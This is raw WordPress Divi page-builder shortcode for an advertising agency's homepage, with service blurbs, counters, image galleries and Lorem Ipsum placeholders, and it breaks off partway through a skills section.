max_width_last_edited=\"on|desktop\" custom_padding=\"0px||0px|\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" hover_enabled=\"0\" make_fullwidth=\"on\" alt=\"Main Banner WhatTheHell?\" title_text=\"main banner \"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" global_module=\"569\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>\n[/et_pb_text][et_pb_button button_text=\"Learn More\" _builder_version=\"4.5.2\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"fade\" hover_enabled=\"0\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" button_alignment=\"center\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-04-1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 